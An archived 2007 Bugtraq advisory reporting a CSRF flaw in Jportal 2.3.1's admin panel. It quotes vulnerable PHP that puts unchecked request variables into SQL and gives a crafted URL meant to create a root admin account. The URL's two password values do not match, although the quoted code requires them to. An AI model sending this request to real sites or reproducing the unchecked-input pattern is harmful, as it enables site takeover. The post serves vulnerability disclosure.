lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 11 Feb 2007 22:45:22 -0000
From: dzitu@...zta.fm
To: bugtraq@...urityfocus.com
Subject: Jportal 2.3.1 CSRF vulnerability

Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (very possible, that older versions are vulnerable too)
Problem is in admin/admin.adm.php:

function add_admin() {

 global $name, $mail, $nick_, $action, $user_tbl, $access;
 global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

if($access=='root') {

if($_pass==$pass_) {


if($acce[news]=='') $acce[news]='n';
if($acce[info]=='') $acce[info]='n';
if($acce[art]=='') $acce[art]='n';
if($acce[sonda]=='') $acce[sonda]='n';
if($acce[link]=='') $acce[link]='n';
if($acce[forum]=='') $acce[forum]='n';
if($acce[comm]=='') $acce[comm]='n';
if($acce[menu]=='') $acce[menu]='n';
if($acce[bann]=='') $acce[bann]='n';
if($acce[topic]=='') $acce[topic]='n';
if($acce[file]=='') $acce[file]='n';



if($acce[root]<>'t') {

$acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.$acce[sonda].'-'.$acce[link].'-'.$acce[forum].'-'.$acce[comm].'-'.$acce[file].'-'.$acce[menu].'-'.$acce[bann].'-'.$acce[topic];

} else {

$acce_ = 'root';

}


 $query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)";
 $result = mysql_query($query);

 add_log('dodano administratora (ID '.mysql_insert_id().')');


if($goto=='')
header("Location: admin.php?op=$op");
else
header("Location: $goto");
exit;

As we can see, all variables comes from "nowhere" (i.e. it can be POST, GET, even COOKIE) and it's not checked, if script was launched by admin through admin panel or not. Due to this fact, if only admin has logged in and not logged out, if we let him send prepared request, we can get a root account (For example using our profile avatar).

http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admin&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us root account with name "admin" and password "pass".

D&#380;itu
dzitu@...zta.fm

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ